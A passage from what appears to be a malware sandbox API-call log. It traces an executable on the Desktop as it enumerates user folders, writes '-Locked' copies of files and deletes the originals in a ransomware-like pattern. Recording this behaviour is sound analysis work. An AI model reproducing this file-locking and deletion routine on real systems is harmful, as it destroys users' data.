ftLastAccessTime.dwLowDateTime=0x34c46153, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c46153, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk-Locked", cAlternateFileName="DESKTO~1.LNK")) returned 1 [0305.311] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cabfde, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cabfde, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cabfde, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk-Locked", cAlternateFileName="DOWNLO~2.LNK")) returned 1 [0305.311] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.311] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.312] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links", lpFilePart=0x0) returned 0x1b [0305.312] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\", lpFilePart=0x0) returned 0x1c [0305.312] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34cb35ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.312] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34cb35ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.312] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c3d9d5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c3d9d5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c3d9d5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.313] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34c46153, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34c46153, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c46153, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk-Locked", cAlternateFileName="DESKTO~1.LNK")) returned 1 [0305.313] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cabfde, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cabfde, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cabfde, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk-Locked", cAlternateFileName="DOWNLO~2.LNK")) returned 1 [0305.313] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34cabfde, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34cabfde, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cabfde, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk-Locked", cAlternateFileName="DOWNLO~2.LNK")) returned 0 [0305.314] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.314] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x35 [0305.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.314] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.315] GetFileType (hFile=0x49c) returned 0x1 [0305.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.315] GetFileType (hFile=0x49c) returned 0x1 [0305.316] CloseHandle (hObject=0x49c) returned 1 [0305.317] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2e [0305.317] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.ini-locked")) returned 1 [0305.318] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked-Locked", lpFilePart=0x0) returned 0x35 [0305.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.318] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.318] GetFileType (hFile=0x49c) returned 0x1 [0305.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.318] GetFileType (hFile=0x49c) returned 0x1 [0305.321] CloseHandle (hObject=0x49c) returned 1 [0305.321] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked", lpFilePart=0x0) returned 0x2e [0305.321] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Desktop.lnk-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\desktop.lnk-locked")) returned 1 [0305.322] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked-Locked", lpFilePart=0x0) returned 0x37 [0305.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.322] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.322] GetFileType (hFile=0x49c) returned 0x1 [0305.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.323] GetFileType (hFile=0x49c) returned 0x1 [0305.344] CloseHandle (hObject=0x49c) returned 1 [0305.344] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked", lpFilePart=0x0) returned 0x30 [0305.344] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Links\\Downloads.lnk-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\links\\downloads.lnk-locked")) returned 1 [0305.345] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.345] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpFilePart=0x0) returned 0x1e [0305.345] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpFilePart=0x0) returned 0x1f [0305.345] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.345] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3465e363, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3465e363, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3465e363, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.346] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0305.346] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.346] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.346] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts", lpFilePart=0x0) returned 0x1e [0305.346] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\", lpFilePart=0x0) returned 0x1f [0305.347] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34666b77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34666b77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3465e363, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3465e363, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3465e363, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0305.347] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3465e363, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3465e363, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3465e363, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 0 [0305.348] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0305.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0305.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0305.348] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x38 [0305.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0305.348] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0305.348] GetFileType (hFile=0x49c) returned 0x1 [0305.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0305.349] GetFileType (hFile=0x49c) returned 0x1 [0305.351] CloseHandle (hObject=0x49c) returned 1 [0305.351] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0305.351] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Contacts\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\contacts\\desktop.ini-locked")) returned 1 [0305.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0305.352] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0305.352] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0305.352] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f2104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0305.352] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36485145, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f2104, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0305.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365d739a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x365d739a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365d739a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~1.JPG")) returned 1 [0305.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365ead97, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x365ead97, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365ead97, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~2.MKV")) returned 1 [0305.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0305.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x365f3433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0305.353] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0305.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0305.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0305.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x32993524, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32993524, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0305.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0305.354] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0305.355] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, 